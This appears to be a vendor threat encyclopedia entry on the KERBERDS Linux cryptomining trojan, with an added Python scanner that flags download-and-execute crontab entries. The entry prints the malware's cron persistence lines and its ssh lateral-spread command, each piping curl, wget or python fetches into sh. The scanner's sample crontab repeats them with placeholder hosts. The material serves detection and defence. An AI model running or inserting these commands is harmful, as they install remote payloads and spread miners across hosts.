Trojan.SH.KERBERDS.A
Platform: Linux
Threat Type: Trojan
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
Infection Channel: Downloaded from the Internet
This new version of KERBERDS, a cryptomining malware that uses an ld.so.preload-based rootkit for stealth, now hides CNC traffic in DNS TXT records.
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
TECHNICAL DETAILS
File Size: 3,796 bytes
File Type: Other
Memory Resident: No
Initial Samples Received Date: 24 Oct 2019
Payload: Connects to URLs/IPs
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Download Routine
This Trojan connects to the following website(s) to download and execute a malicious file:
- http://img.{BLOCKED}t.com/chatres/89/msg/20191022/78e3582c42824f17aba17feefb87ea5f.png - detected as Trojan.Linux.KERBERDS.UWEJL (64-bit)
- http://img.{BLOCKED}t.com/chatres/89/msg/20191022/2be662ee79084035914e9d6a6d6be10d.png - detected as Trojan.Linux.KERBERDS.UWEJL (32-bit)
- http://cdn.{BLOCKED}oai.com/cvd/dist/fileUpload/1571723350789/0.25579108623802416.jpg - detected as Trojan.Linux.KERBERDS.UWEJL (64-bit)
- http://cdn.{BLOCKED}oai.com/cvd/dist/fileUpload/1571723382710/9.915787746614242.jpg - detected as Trojan.Linux.KERBERDS.UWEJL (32-bit)
- https://user-images.{BLOCKED}usercontent.com/56861392/67261951-83ebf080-f4d5-11e9-9807-d0919c3b4b74.jpg - detected as Trojan.Linux.KERBERDS.UWEJL (64-bit)
- https://user-images.{BLOCKED}usercontent.com/56861392/67262078-0aa0cd80-f4d6-11e9-8639-63829755ed31.jpg - detected as Trojan.Linux.KERBERDS.UWEJL (32-bit)
It saves the files it downloads using the following names:
- 48f14124d703c2
Other Details
This Trojan does the following:
- It creates the following cron jobs for persistence:
  - Path: /var/spool/cron/crontabs/root
    Schedule: Every 10 minutes
    Command: */10 * * * * (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen("http://lsd.{BLOCKED}ten.org").read()')|sh
  - Path: /etc/crontab
    Schedule: Every 10 minutes
    Command: */10 * * * * root (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen("http://lsd.{BLOCKED}ten.org").read()'||/usr/local/sbin/48f14124d703c2)|sh
  - Path: /var/spool/cron/crontabs/root
- It removes the immutable property of the following files:
- /etc/cron*
- /var/spool/cron*
- It executes the following command on every host in the known_hosts file via ssh:
- (curl -fsSL lsd.{BLOCKED}ten.org||wget -q -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen("http://lsd.{BLOCKED}ten.org").read()')|sh >/dev/null 2>&1 &
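As a defender-side example added here (not Trend Micro's code and not part of this description), the following script audits crontab contents for the download-and-execute pattern the persistence entries above exhibit: a curl, wget or python-urllib fetch whose output is handed to sh, or several downloaders chained with || as fallbacks. The sample crontab, the example.org/example.net hostnames and the /tmp/payload variant are constructed placeholders, not indicators from the page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample of a system crontab (/etc/crontab format: five schedule
# fields, a user, then the command). Hostnames are placeholders. Line 3 mimics
# the fallback downloader chain described above; line 6 is a simpler
# drop-to-/tmp-and-run variant; lines 2, 4 and 5 are benign controls.
SAMPLE_SYSTEM_CRONTAB = """\
# m h dom mon dow user  command
17 *   * * *  root  cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root (curl -fsSL -m15 lsd.example.org||wget -q -T15 -O- lsd.example.org||python -c 'import urllib;print urllib.urlopen("http://lsd.example.org").read()'||/usr/local/sbin/48f14124d703c2)|sh
0 3 * * *  root  /usr/bin/certbot renew --quiet
0 2 * * *  root  curl -fsS https://status.example.org/ping >/dev/null
*/5 * * * * www-data wget -q -O /tmp/payload http://cdn.example.net/x.jpg && sh /tmp/payload
"""

# Tools that pull content from the network; the description lists curl, wget
# and a python urllib one-liner used interchangeably.
FETCHER = re.compile(r"\b(curl|wget|python[23]?\s+-c\s+['\"]import\s+urllib)\b")
# Ways fetched content reaches a shell: "| sh" / "|bash", or "&& sh <file>".
SHELL_SINK = re.compile(r"\|\s*(?:ba)?sh\b|&&\s*(?:ba)?sh\s+\S+")


@dataclass
class Finding:
    line_no: int
    schedule: str
    user: Optional[str]          # None for per-user spool files (no user column)
    command: str
    reasons: List[str] = field(default_factory=list)


def split_cron_line(line: str, system_crontab: bool):
    """Return (schedule, user, command), or None for blank/comment/env lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
        return None
    # @reboot / @daily entries carry one schedule field instead of five.
    sched_fields = 1 if stripped.startswith("@") else 5
    extra = 1 if system_crontab else 0
    parts = stripped.split(None, sched_fields + extra)
    if len(parts) < sched_fields + extra + 1:
        return None
    schedule = " ".join(parts[:sched_fields])
    user = parts[sched_fields] if system_crontab else None
    command = parts[sched_fields + extra]
    return schedule, user, command


def classify_command(command: str) -> List[str]:
    """Explain why a cron command looks like a download-and-execute stager."""
    reasons = []
    fetchers = FETCHER.findall(command)
    if fetchers and SHELL_SINK.search(command):
        reasons.append("content fetched from the network is executed by a shell")
    if len(fetchers) >= 2 and "||" in command:
        reasons.append("several downloaders chained with || as fallbacks")
    return reasons


def scan_crontab(text: str, system_crontab: bool) -> List[Finding]:
    """Scan crontab text; system_crontab=True for /etc/crontab, False for spools."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        parsed = split_cron_line(line, system_crontab)
        if parsed is None:
            continue
        schedule, user, command = parsed
        reasons = classify_command(command)
        if reasons:
            findings.append(Finding(line_no, schedule, user, command, reasons))
    return findings


def scan_file(path: str, system_crontab: bool) -> List[Finding]:
    """Convenience wrapper for a crontab on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_crontab(fh.read(), system_crontab)


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_SYSTEM_CRONTAB, system_crontab=True):
        print(f"line {f.line_no}: [{f.schedule}] user={f.user}")
        for reason in f.reasons:
            print(f"    - {reason}")
        print(f"    {f.command[:100]}")
```

Point `scan_file` at /etc/crontab with `system_crontab=True` and at each file under /var/spool/cron/crontabs/ with `system_crontab=False`, since the per-user spools have no user column. Because this family clears the immutable attribute on /etc/cron* and /var/spool/cron* before writing, a scan of those paths pairs naturally with reviewing `lsattr` output and the contents of /etc/ld.so.preload on the same host.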
SOLUTION
Minimum Scan Engine: 9.850
First VSAPI Pattern File: 15.450.07
First VSAPI Pattern Release Date: 24 Oct 2019
VSAPI OPR Pattern Version: 15.451.00
VSAPI OPR Pattern Release Date: 25 Oct 2019
Scan your computer with your Trend Micro product to delete files detected as Trojan.SH.KERBERDS.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information: